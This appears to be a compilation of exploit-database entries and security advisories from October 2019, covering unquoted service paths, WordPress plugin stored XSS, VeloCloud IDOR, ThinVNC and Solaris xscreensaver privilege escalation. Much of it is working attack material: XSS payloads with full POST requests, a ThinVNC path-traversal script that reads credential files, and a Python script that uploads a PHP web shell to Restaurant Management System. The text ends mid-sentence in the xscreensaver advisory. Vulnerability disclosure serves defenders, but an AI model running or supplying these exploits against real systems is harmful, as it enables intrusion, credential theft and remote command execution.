# Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path 
# Exploit Author: Debashis Pal
# Date: 2019-10-17
# Vendor : Blackmoonftpserver
# Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server
# Version: BlackMoon FTP Server 3.1.2.1731
# CVE : N/A
# Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit)

1. Description:
Unquoted service paths in BlackMoon FTP Server versions 3.1.2.1731 'BMFTP-RELEASE' have an unquoted service path.

2. PoC:

C:\>sc qc BMFTP-RELEASE
sc qc BMFTP-RELEASE
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BMFTP-RELEASE
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : BlackMoon FTP Service
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem


3. Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges of the application.



# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path
# Exploit Author: Debashis Pal
# Date: 2019-10-17
# Vendor Homepage : https://webcompanion.com
# Source: https://webcompanion.com
# Version: Web Companion versions 5.1.1035.1047
# CVE : N/A
# Tested on: Windows 7 SP1(64bit)

1. Description:
Web Companion versions 5.1.1035.1047 service 'WCAssistantService' have an unquoted service path.

2. PoC:

C:\>sc qc WCAssistantService
sc qc WCAssistantService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WCAssistantService
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : WC Assistant
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem


3. Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges of the application.

# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Serive Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor: Softalk
# Version : 7.5.1
# Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3
# Tested on Windows 10
# CVE : N/A 


c:\>sc qc WorkgroupMail
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WorkgroupMail
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WorkgroupMail
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit Title: Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\foogallery"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://foo.gallery/
# Software Link: https://wordpress.org/plugins/foogallery/
# Version: 1.8.12
# Tested on: Kali Linux
# CVE: N/A


# Description
# This vulnerability is in the validation mode and is located in the plugin settings panel and the vulnerability type is stored ,it happend becuse in setting is an select tag ,this select tag have option with value of title gallerys so simply we just have to break option and write our script tag
the vulnerability parameters are as follows.

1.Go to the 'add Gallery' of FooGallery
2.Enter the payload in the "add Title"
3.Click the "Publish" option
4.Go to plugin setting of FooGallery
5.Your payload will run


# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
# Parameter & Payoad: post_title="/><script>alert("Unk9vvn")</script>


#
# POC
#
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 2694
Cookie: ......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

_wpnonce=933471aa43&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dfoogallery&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=foogallery&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&auto_draft=&post_ID=32&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=14&mn=42&ss=45&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=14&cur_hh=14&hidden_mn=42&cur_mn=42&original_publish=Publish&publish=Publish&foogallery_sort=&foogallery_clear_gallery_thumb_cache_nonce=e18d32a542&_thumbnail_id=-1&_foogallery_settings%5Bfoogallery_items_view%5D=manage&foogallery_nonce=b6066e6407&foogallery_attachments=&foogallery_preview=e35a011572&foogallery_template=default&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bwidth%5D=150&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bheight%5D=150&_foogallery_settings%5Bdefault_thumbnail_link%5D=image&_foogallery_settings%5Bdefault_lightbox%5D=none&_foogallery_settings%5Bdefault_spacing%5D=fg-gutter-10&_foogallery_settings%5Bdefault_alignment%5D=fg-center&_foogallery_settings%5Bdefault_theme%5D=fg-light&_foogallery_settings%5Bdefault_border_size%5D=fg-border-thin&_foogallery_settings%5Bdefault_rounded_corners%5D=&_foogallery_settings%5Bdefault_drop_shadow%5D=fg-shadow-outline&_foogallery_settings%5Bdefault_inner_shadow%5D=&_foogallery_settings%5Bdefault_loading_icon%5D=fg-loading-default&_foogallery_settings%5Bdefault_loaded_effect%5D=fg-loaded-fade-in&_foogallery_settings%5Bdefault_hover_effect_color%5D=&_foogallery_settings%5Bdefault_hover_effect_scale%5D=&_foogallery_settings%5Bdefault_hover_effect_caption_visibility%5D=fg-caption-hover&_foogallery_settings%5Bdefault_hover_effect_transition%5D=fg-hover-fade&_foogallery_settings%5Bdefault_hover_effect_icon%5D=fg-hover-zoom&_foogallery_settings%5Bdefault_caption_title_source%5D=&_foogallery_settings%5Bdefault_caption_desc_source%5D=&_foogallery_settings%5Bdefault_captions_limit_length%5D=&_foogallery_settings%5Bdefault_paging_type%5D=&_foogallery_settings%5Bdefault_custom_settings%5D=&_foogallery_settings%5Bdefault_custom_attributes%5D=&_foogallery_settings%5Bdefault_lazyload%5D=&post_name=&foogallery_custom_css=

# Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\soliloquy-lite"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://soliloquywp.com/
# Software Link: https://wordpress.org/plugins/soliloquy-lite/
# Version: 2.5.6
# Tested on: Kali Linux
# CVE: N/A


# Description
# This vulnerability is in the validation mode and is located in the Prevew of new post inside soliloquy and the vulnerability type is stored ,it happend when a user insert script tag in title input then save the post. everything will be ok until target click on preview of vulnerabil.

1.Go to the 'Add new' section of soliloquy
2.Enter the payload in the "add Title"
3.Select a sample image
4.Click the "Publish" option
5.Click on Preview
6.Your payload will run


# URI: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
# Parameter & Payoad: post_title=/"><script>alert("Unk9vvN")</script>


#
# POC
#
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1599
Cookie: .......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

_wpnonce=d9f78b76e2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=soliloquy&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&post_ID=50&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&_soliloquy%5Btype%5D=default&async-upload=&post_id=50&soliloquy=bdfd10296c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&_soliloquy%5Btype_default%5D=1&_soliloquy%5Bslider_theme%5D=base&_soliloquy%5Bslider_width%5D=960&_soliloquy%5Bslider_height%5D=300&_soliloquy%5Btransition%5D=fade&_soliloquy%5Bduration%5D=5000&_soliloquy%5Bspeed%5D=400&_soliloquy%5Bgutter%5D=20&_soliloquy%5Bslider%5D=1&_soliloquy%5Baria_live%5D=polite&_soliloquy%5Btitle%5D=%2F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_soliloquy%5Bslug%5D=scriptalert1script&_soliloquy%5Bclasses%5D=&wp-preview=dopreview&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=21&ss=21&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=21&cur_mn=21&original_publish=Update

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:                      VeloCloud
# Vendor:                       VMware
# CVE ID:                       CVE-2019-5533
# CSNC ID:                      CSNC-2019-007
# Subject:                      Authorization Bypass
# Risk:                         Moderate
# Effect:                       Remotely exploitable
# CVSS v3.1 Vector:             AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
# Author:                       Silas Bärtsch <silas.baertsch@compass-security.com>
# Date:                         10.16.2019
#
#############################################################

Introduction:
-------------
VeloCloud [1], now part of VMware, is a SD-WAN market leader.
VMware SD-WAN by VeloCloud is a key component of the Virtual Cloud Network
and tightly integrated with NSX Data Center and NSX Cloud to enable customers
extend consistent networking and security policies from the data center
to the branch to the cloud. Compass Security [2] identified a vulnerability
that allows a VeloCloud standard admin user to access user information
of other VeloCloud customers.

Affected:
---------
Vulnerable:
        3.3.0 and 3.2.2.

Not vulnerable:
        3.3.1

No other version was tested, but it is believed for the older versions to be
vulnerable as well.

Technical Description
---------------------
The standard admin user uses the following HTTP request to retrieve
user information. The request contains the id parameter twice. The server
does not perform any authorization checks on this parameter. Changing
it will return the user details of the corresponding user, even if the
returned user details belong to other VeloCloud customers.

```
POST /portal/ HTTP/1.1
Host: vco109-usca1.velocloud.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://vco109-usca1.velocloud.net/
Content-Type: application/json
x-vco-privileges-version: 1560945325637
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: culture=en-US; velocloud.session=[CUT-BY-COMPASS]
Connection: close

{"jsonrpc":"2.0","method":"enterpriseUser/getEnterpriseUser","params":{"id":1},"id":1}
```

The following information is returned.
```
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Jun 2019 13:02:11 GMT
Content-Type: application/json
Content-Length: 569
Connection: close
X-Powered-By: Express
Set-Cookie: velocloud.message=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT
x-vco-privileges-version: 1560945325637
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Strict-Transport-Security: max-age=31536000; includeSubdomains;
X-Frame-Options: SAMEORIGIN

{"jsonrpc":"2.0","result":
{
"id":[CUT-BY-COMPASS],
"created":"[CUT-BY-COMPASS]",
"userType":"[CUT-BY-COMPASS]",
"username":"[CUT-BY-COMPASS]",
"domain":[CUT-BY-COMPASS],
"password":"*****",
"firstName":[CUT-BY-COMPASS],
"lastName":[CUT-BY-COMPASS],
"officePhone":[CUT-BY-COMPASS],
"mobilePhone":[CUT-BY-COMPASS],
"email":"[CUT-BY-COMPASS]",
"isNative":[CUT-BY-COMPASS],
"isActive":[CUT-BY-COMPASS],
"isLocked":[CUT-BY-COMPASS],
"disableSecondFactor":[CUT-BY-COMPASS],
"lastLogin":"[CUT-BY-COMPASS]",
"modified":"[CUT-BY-COMPASS]",
"passwordModified":"[CUT-BY-COMPASS]",
"enterpriseId":[CUT-BY-COMPASS],
"enterpriseProxyId":[CUT-BY-COMPASS],
"roleId":[CUT-BY-COMPASS],
"roleName":"[CUT-BY-COMPASS]",
"networkId":[CUT-BY-COMPASS],
"isSuper":[CUT-BY-COMPASS]},
"id":[CUT-BY-COMPASS]
}
```

Workaround / Fix:
-----------------
Upgrade to VeloCloud 3.3.1, where the authorization checks are performed correctly.

Timeline:
---------
2019-10-16:     Coordinated public disclosure date
2019-08-26:     Assigned CVE-2019-5533
2019-08-21:     Release of VeloCloud 3.3.1 which includes a fix for the vulnerability
2019-07-02:     Initial vendor response
2019-07-01:     Initial vendor notification
2019-06-27:     Assigned CSNC-2019-007
2019-06-19:     Discovery by Silas Bärtsch

References:
-----------
[1] https://www.velocloud.com
[2] https://compass-security.com

# Exploit Title: Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\popupbuilder"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://popup-builder.com/
# Software Link: https://wordpress.org/plugins/popup-builder/
# Version: 3.49
# Tested on: Kali Linux
# CVE: N/A


# Description
# This vulnerability is in the validation mode and is located in "Add Post" or "Add Page" of wordpress and the vulnerability type is stored ,after install Popup Builder it will make section in Add Post  and Add Page . in this section you will choose which popup show it will create option tag with value of title of the popups, now its easy we just break option tag and insert our script tag inside popup title.

1.Go to the 'Add new' section of Popup Builder
2.Select Image type
3.Enter the payload in the "add Title"
4.Click the "Publish" option
5.Go to Add New of Page section or Add New of Post section
6.Your payload will run


# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=popupbuilder&sgpb_type=image&wp-post-new-reload=true
# Parameter & Payoad: post_title="/><script>alert("Unk9vvN")</script>


#
# POC
#
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post.php?post=39&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 2425
Cookie: ......
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

_wpnonce=8dde4c5262&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=popupbuilder&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&post_ID=39&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=01&ss=34&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=01&cur_mn=03&original_publish=Update&save=Update&tax_input%5Bpopup-categories%5D%5B%5D=0&newpopup-categories=New+Category+Name&newpopup-categories_parent=-1&_ajax_nonce-add-popup-categories=11ba2a6f5c&sgpb-image-url=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-content%2Fuploads%2F2019%2F09%2Fwp2601087.jpg&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=not_rule&sgpb-type=image&sgpb-is-preview=0&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=select_event&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-custom-class=sgpb-popup-overlay&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120&sgpb-min-height=&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&post_name=scriptalert1script

# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
# Date: 2019-10-17
# Exploit Author: Nikhith Tumamlapalli
# Contributor WarMarX
# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
# Version: 1.0b1
# Tested on: Windows All Platforms
# CVE : CVE-2019-17662

# Description:
# Authentication Bypass via Arbitrary File Read

#!/usr/bin/python3

import sys
import os
import requests

def exploit(host,port):
    url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
    r = requests.get(url)
    body = r.text
    print(body.splitlines()[2])
    print(body.splitlines()[3])



def main():
    if(len(sys.argv)!=3):
        print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
        print("Example:\n{} 192.168.0.10 5888")
    else:
        port = sys.argv[2]
        host = sys.argv[1]
        exploit(host,port)

if __name__ == '__main__':
    main()

# Exploit Title: Restaurant Management System 1.0  - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Ibad Shah
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: N/A
# Tested on: Apache 2.4.41

#!/usr/bin/python

import requests
import sys

print ("""
    _  _   _____  __  __  _____   ______            _       _ _
  _| || |_|  __ \|  \/  |/ ____| |  ____|          | |     (_) |
 |_  __  _| |__) | \  / | (___   | |__  __  ___ __ | | ___  _| |_
  _| || |_|  _  /| |\/| |\___ \  |  __| \ \/ / '_ \| |/ _ \| | __|
 |_  __  _| | \ \| |  | |____) | | |____ >  <| |_) | | (_) | | |_
   |_||_| |_|  \_\_|  |_|_____/  |______/_/\_\ .__/|_|\___/|_|\__|
                                             | |
                                             |_|


""")
print ("Credits : All InfoSec (Raja Ji's) Group")
url = sys.argv[1]

if len(sys.argv[1]) < 8:
print("[+] Usage : python rms-rce.py http://localhost:80/")
exit()

print ("[+] Restaurant Management System Exploit, Uploading Shell")

target = url+"admin/foods-exec.php"



headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0)
Gecko/20100101 Firefox/69.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Length": "327",
"Content-Type": "multipart/form-data;
boundary=---------------------------191691572411478",
"Connection": "close",
"Referer": "http://localhost:8081/rms/admin/foods.php",
"Cookie": "PHPSESSID=4dmIn4q1pvs4b79",
"Upgrade-Insecure-Requests": "1"

}

data = """

-----------------------------191691572411478
Content-Disposition: form-data; name="photo"; filename="reverse-shell.php"
Content-Type: text/html

<?php echo shell_exec($_GET["cmd"]); ?>
-----------------------------191691572411478
Content-Disposition: form-data; name="Submit"

Add
-----------------------------191691572411478--
"""
r = requests.post(target,verify=False, headers=headers,data=data,
proxies={"http":"http://127.0.0.1:8080"})


print("[+] Shell Uploaded. Please check the URL :
"+url+"images/reverse-shell.php")

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

CA20191015-01: Security Notice for CA Performance Management

Issued: October 15th, 2019
Last Updated: October 15th, 2019

CA Technologies, A Broadcom Company, is alerting customers to a
potential risk with CA Performance Management. A vulnerability exists
that can allow a remote attacker to execute arbitrary commands. CA
published solutions to address the vulnerabilities and recommends
that all affected customers implement these solutions.

The vulnerability, CVE-2019-13657, occurs due to default credentials
and a configuration weakness. A malicious actor may use the default
credentials and exploit a weakness in the configuration to execute
arbitrary commands on the Performance Center server.

Risk Rating

High

Platform(s)

All supported platforms

Affected Products

NetOps 19.1 and prior

Component Version(s) Affected:

CA Performance Management 3.7.x prior to 3.7.4
CA Performance Management 3.6.x prior to 3.6.9
CA Performance Management 3.5.x

How to determine if the installation is affected

Customers may use the product version to determine if their product
installation is affected.

Solution

CA Technologies published the following solutions to address the
vulnerabilities. Customers should also review Firewall and
Connectivity Considerations at
https://docops.ca.com/ca-performance-management/3-7/en
located under the Installing -> Review Installation Requirements and
Considerations section. As always we recommend that you follow good
password management for all passwords within the system.

CA Performance Management 3.7.x:
Update to Performance Management 3.7.4 or later.
Review the 3.7.x upgrade steps and MySQL password guidance located
at https://docops.ca.com/ca-performance-management/3-7/en under
the Upgrading -> Upgrade Performance Center section.

CA Performance Management 3.6.x:
Update to Performance Management 3.6.9 or later. Alternatively,
customers may update to 3.7.4 or later.
Review the 3.6.x upgrade steps and MySQL password guidance located
at https://docops.ca.com/ca-performance-management/3-6/en under
the Upgrading -> Upgrade Performance Center section.

CA Performance Management 3.5.x:
Update to Performance Management 3.7.4 or later.
Review the 3.7.x upgrade steps and MySQL password guidance located
at https://docops.ca.com/ca-performance-management/3-7/en under
the Upgrading -> Upgrade Performance Center section.
For explicit 3.5.x guidance on changing the password for MySQL,
review the steps located at
https://docops.ca.com/ca-performance-management/3-5/en under
the Upgrading -> Upgrade Performance Center section.

References

CVE-2019-13657 - Performance Management default credentials

Acknowledgement

CVE-2019-13657 - Hendrik Van Belleghem

Change History

Version 1.0: 2019-10-15 - Initial Release

CA customers may receive product alerts and advisories by subscribing
to Proactive Notifications on the support site.

Customers who require additional information about this notice may
contact CA Technologies Support at https://casupport.broadcom.com/

To report a suspected vulnerability in a CA Technologies product,
please send a summary to CA Technologies Product Vulnerability
Response at ca.psirt <AT> broadcom.com

Security Notices, PGP key, and disclosure policy and guidance
https://techdocs.broadcom.com/ca-psirt

Kevin Kotas
CA Product Security Incident Response Team

Copyright 2019 Broadcom. All Rights Reserved. The term "Broadcom"
refers to Broadcom Inc. and/or its subsidiaries. Broadcom, the pulse
logo, Connecting everything, CA Technologies and the CA technologies
logo are among the trademarks of Broadcom. All trademarks, trade
names, service marks and logos referenced herein belong to their
respective companies.

-----BEGIN PGP SIGNATURE-----
Charset: utf-8

wsBVAwUBXad/CLZ6yOO9o8STAQi/cwf/ckenS70yqt6n8L86aCsRl6x5kdN/ApMh
+VIYpv6zwQpVC29D92vYJT8YDGfNu105mk9u2vUok6lBhuOM5rH+thY4DQL9mybz
bu6dQfppkqTu+zcZF2aInBZskUSVOGMGYEyVq2y08NPG4vcbTrytWSc7bfgpleNP
+vDD528Cl5H61ftXV8V25Xg/Vy5ArSAqm4gHcChId84uHHU7jXNtPug8wDUdjJ4i
R9nGNBtmqJdJuPuj/FsTeCUt5U0R+3ghAo5Efaat5SzcNDd//hyBoLHFe43oJ42o
TAaUPBmkbq8xYnXc55cbWBUUdKk3gTK45jIuOAz7rDV8jDtf2CkHeg==
=6FMp
-----END PGP SIGNATURE-----

@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16)

         Title:  Local privilege escalation on Solaris 11.x via xscreensaver
   Application:  Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4
    Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3
    Other versions starting from 5.06 are potentially affected
     Platforms:  Oracle Solaris 11.x (tested on 11.4 and 11.3)
    Other platforms are potentially affected (see below)
   Description:  A local attacker can gain root privileges by exploiting a
    design error vulnerability in the xscreensaver distributed with
    Solaris
        Author:  Marco Ivaldi <marco.ivaldi@mediaservice.net>
 Vendor Status:  <secalert_us@oracle.com> notified on 2019-07-09
      CVE Name:  CVE-2019-3010
   CVSS Vector:  CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
    References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt
    https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
    https://www.jwz.org/xscreensaver/
    https://www.oracle.com/technetwork/server-storage/solaris11/
    https://www.mediaservice.net/
    https://0xdeadbeef.info/

1. Abstract.

Exploitation of a design error vulnerability in xscreensaver, as distributed
with Solaris 11.x, allows local attackers to create (or append to) arbitrary
files on the system, by abusing the -log command line switch introduced in
version 5.06. This flaw can be leveraged to cause a denial of service condition
or to escalate privileges to root.

2. Example Attack Session.

raptor@stalker:~$ cat /etc/release
                             Oracle Solaris 11.4 X86
  Copyright (c) 1983, 2018, Oracle and/or its affiliates.  All rights reserved.
                            Assembled 16 August 2018
raptor@stalker:~$ uname -a
SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
raptor@stalker:~$ id
uid=100(raptor) gid=10(staff)
raptor@stalker:~$ chmod +x raptor_xscreensaver
raptor@stalker:~$ ./raptor_xscreensaver
raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
[...]
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
root@stalker:~# id
uid=0(root) gid=0(root)

3. Affected Platforms.

This vulnerability was confirmed on the following platforms:

* Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation]
* Oracle Solaris 11.x SPARC [untested]

Previous Oracle Solaris 11 versions might also be vulnerable.

Based on our analysis and on feedback kindly provided by Alan Coopersmith of
Oracle, we concluded that this is a Solaris-specific vulnerability, caused by
the fact that Oracle maintains a slightly different codebase from the upstream
one. Alan explained this as follows:

"The problem in question here appears to be inherited from the long-ago fork
[originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based
unlock dialog with accessibility support to replace the non-accessible Xlib
unlock dialog that upstream provides, which moves the uid reset to after where
the log file opening was later added."

Specifically, the problem arises because of this bit of Solaris patches:
https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770

As an interesting side note, it appears Red Hat dropped this code back in 2002
with version 4.05-5:
https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179

4. Fix.

Oracle has assigned the tracking# S1182608 and has released a fix for all
affected and supported versions of Solaris in their Critical Patch Update (CPU)
of October 2019.

As a temporary workaround, it is also possible to remove the setuid bit from
the xscreensaver executable as follows (note that this might prevent it from
working properly):

